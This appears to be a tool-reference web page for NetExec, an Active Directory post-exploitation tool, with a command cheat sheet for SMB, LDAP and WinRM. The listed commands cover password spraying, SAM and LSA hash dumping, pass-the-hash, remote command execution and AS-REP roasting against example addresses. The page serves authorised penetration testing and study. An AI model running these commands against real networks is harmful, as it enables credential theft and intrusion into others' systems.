Post Exploitation
NetExec (formerly CrackMapExec successor) is a post-exploitation tool for enumerating and attacking Active Directory environments. It automates SMB, WinRM, LDAP, and SSH attacks across large networks with support for Kerberos, NTLM, and pass-the-hash authentication.
sudo apt install netexec
netexec <protocol> <target> [options]
NetExec is the leading post-exploitation tool for Active Directory security testing. Successor to CrackMapExec, it provides automated SMB, LDAP, WinRM, SSH, and MSSQL enumeration and attack capabilities with pass-the-hash, Kerberos, and NTLM authentication support.
The tool's color-coded output (green for success, red for failure, yellow for partial) enables rapid interpretation of results across large network scans. Its modular architecture supports protocol-specific modules for targeted operations.
Security professionals use NetExec during Active Directory penetration tests to enumerate hosts, test credentials, discover accessible shares, extract user lists, dump password hashes, and perform lateral movement across Windows networks.
netexec smb 192.168.1.0/24SMB network scan — discover live SMB hosts across a subnetnetexec smb 192.168.1.10 -u admin -p passwordSMB authentication — test credentials against a targetnetexec smb 192.168.1.10 -u admin -p password --sharesShare enumeration — list accessible SMB shares with credentialsnetexec smb 192.168.1.10 -u admin -p password --usersUser enumeration — extract local user accounts from the targetnetexec smb 192.168.1.10 -u admin -p password --samSAM dump — extract local password hashes from the SAM databasenetexec ldap 192.168.1.10 -u admin -p password --groupsLDAP group enumeration — list Active Directory group membershipsnetexec smb 192.168.1.0/24 -u admin -p password --pass-polPassword policy — retrieve password policy across the networknetexec smb 192.168.1.10 -u admin -p password --lsaLSA dump — extract cached credentials and LSA secretsnetexec smb 192.168.1.10 -u admin -p password -x whoamiCommand execution — run a command via SMB (wmiexec/atexec)netexec winrm 192.168.1.10 -u admin -p password -X 'Get-Process'WinRM PowerShell — execute a PowerShell command over WinRMnetexec smb 192.168.1.0/24 -u users.txt -p passwords.txtPassword spray — test credential lists across a subnetnetexec smb 192.168.1.10 -u admin -H aad3b435...:31d6cfe0...Pass-the-hash — authenticate with an NTLM hash instead of a passwordnetexec smb 192.168.1.10 -u admin -p password -M spider_plusModule — run the spider_plus module to map share contentsnetexec ldap 192.168.1.10 -u admin -p password --bloodhound -c AllBloodHound — collect AD data for graph analysisnetexec ldap 192.168.1.10 -u admin -p password --asreproast out.txtAS-REP roast — extract crackable hashes for users without preauthDiscover SMB hosts, test credentials, and enumerate shares across large networks.
Extract Active Directory users, groups, computers, and policies through LDAP queries.
Dump SAM and LSA secrets from Windows targets for offline password cracking.
Authenticate using NTLM hashes without knowing plaintext passwords for lateral movement.
Retrieve domain password policies to inform brute-force attack strategies.
Execute commands on targets using WinRM with valid credentials or hashes.
Post Exploitation
Python collection of classes for working with network protocols including SMB, LDAP, and Kerberos.
Post Exploitation
Original AD enumeration tool that NetExec is based on.
Post Exploitation
Command-line tool for interacting with SMB shares directly.
Information Gathering
SMB enumeration tool for detailed share and user information extraction.
Post Exploitation
WinRM shell for remote command execution on Windows systems.
NetExec output uses color-coded results: green for success (authenticated, accessible), red for failure (denied, locked), and yellow for partial results. The tool displays host status, authentication results, share listings, user enumerations, and hash dumps in a structured format suitable for scripting and automation.
This tool is designed for authorized security testing, educational purposes, and legitimate network administration only. Unauthorized access to computer systems is illegal.